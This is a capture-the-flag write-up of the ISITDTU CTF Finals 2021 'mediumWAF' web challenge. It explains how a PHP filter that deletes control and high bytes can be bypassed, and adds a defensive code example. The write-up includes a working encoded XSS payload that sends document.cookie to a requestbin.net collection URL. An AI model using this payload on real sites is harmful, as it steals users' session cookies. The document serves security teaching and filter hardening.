# Write-up for all ISITDTU CTF Finals 2021's web challenges

###### Author: `antoinenguyen_09`

> View the write-ups for the other categories such as pwn, misc, re, crypto [here](https://github.com/antoinenguyen-09/All_CTF_write-ups/tree/master/ISITDTU%20CTF/2021)

## :memo: TLDR:

I was supposed to be out of [ISITDTU CTF Finals 2021](https://ctftime.org/event/1537). However, one of my brothers, @doantung99, said that his team **Jenny Lita** would not join the Finals even though they had finished in the top 8 in Quals. Because of Covid-19, the ISITDTU CTF 2021 finals round couldn't be held at Duy Tan University, while **Jenny Lita** wanted a trip to Danang City :-1: ! That's why I can continue my journey at ISITDTU CTF on behalf of the **Jenny Lita** team :D. As I expected, all the challenges in the Finals were in a much higher class than the ones in Quals.

## :rocket: mediumWAF

> This challenge is nearly the same as [simpleWAF](https://github.com/antoinenguyen-09/All_CTF_write-ups/tree/master/ISITDTU%20CTF/2021/web/simpleWAF) in Quals, but the author changed his filter regex a little bit.

![](https://i.imgur.com/p00Z4xL.png)

[+] [Source](https://github.com/antoinenguyen-09/All_CTF_write-ups/tree/master/ISITDTU%20CTF/2021/web/mediumWAF/source)

### 1. Initial reconnaissance:

- Because it is the same as [simpleWAF](https://github.com/antoinenguyen-09/All_CTF_write-ups/tree/master/ISITDTU%20CTF/2021/web/simpleWAF), I will skip this reconnaissance step; you can read my [Quals write-up](https://hackmd.io/ztYmTvY7REyB-o0xMVt2JA) to understand how this challenge works.

### 2. Bypass the regex:

- First of all, the web app takes the input string and checks whether it has already been URL-encoded in the right way. If there are any [HTML entities](https://www.w3schools.com/html/html_entities.asp) in this string, all of them are turned back into ordinary HTML markup by the `html_entity_decode` function. This is the same as in the **simpleWAF** challenge, nothing special.
- The difference lies in this line of code:

```php=
// Delete every byte in 0x00-0x1F and 0x7F-0xFF from the input.
$xss = preg_replace('/[\x00-\x1F\x7F-\xFF]/', '', $xss);
```

- The above regex matches any single character in the range from hex value `00` to hex value `1F`, or in the range from hex value `7F` to `FF`. All the characters in these 2 ranges are shown below:

![](https://i.imgur.com/u0DfnS4.png)

- Payload:

```htmlembedded=
<iframe/srcdoc%3d"%26lt%3bsvg/%26%23x%25006f%3bnload%3dfetch(%27https%3a//requestbin.net/r/5ykwtcc0%3fa%3d%27.concat(document.cookie),{mode%3a%27no-cors%27})>">
```
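
Why deleting bytes, rather than refusing them, is risky in a filter like the `preg_replace` line above, shown as an added example that is not the challenge's source code. Only the character class comes from the write-up; the function names, the sample strings and the two alternatives (refuse the input, or normalize to a fixed point before checking) are assumptions made here.

```php
<?php
// Added example, not the challenge source. Only the character class is taken
// from the write-up; function names and sample strings are constructed.
const STRIP_CLASS = '/[\x00-\x1F\x7F-\xFF]/';

// Deleting the bytes, as the quoted line does.
function strip_bytes(string $s): string
{
    return preg_replace(STRIP_CLASS, '', $s);
}

// Alternative 1: report the bytes so the caller can refuse the request.
function has_stripped_bytes(string $s): bool
{
    return preg_match(STRIP_CLASS, $s) === 1;
}

// Alternative 2: decode and strip repeatedly until the string stops changing,
// so every later check runs on the final form of the input.
function normalize(string $s, int $maxRounds = 8): ?string
{
    for ($i = 0; $i < $maxRounds; $i++) {
        $next = strip_bytes(html_entity_decode($s, ENT_QUOTES | ENT_HTML5, 'UTF-8'));
        if ($next === $s) {
            return $s;
        }
        $s = $next;
    }
    return null; // still changing after $maxRounds rounds: refuse it
}

// Constructed sample: a NUL byte sits inside a numeric character reference.
$split = "&#x\x006f;";

// Entity decoding alone leaves the reference untouched while the NUL is there.
var_dump(html_entity_decode($split, ENT_QUOTES | ENT_HTML5, 'UTF-8') === $split);
// Deleting the NUL joins the two halves into a reference that decodes later.
var_dump(strip_bytes($split));
var_dump(has_stripped_bytes($split));
var_dump(normalize($split));

// Without the /u modifier the class is byte-wise, so the two bytes of a UTF-8
// "é" are deleted as well.
var_dump(strip_bytes("caf\xC3\xA9"));
```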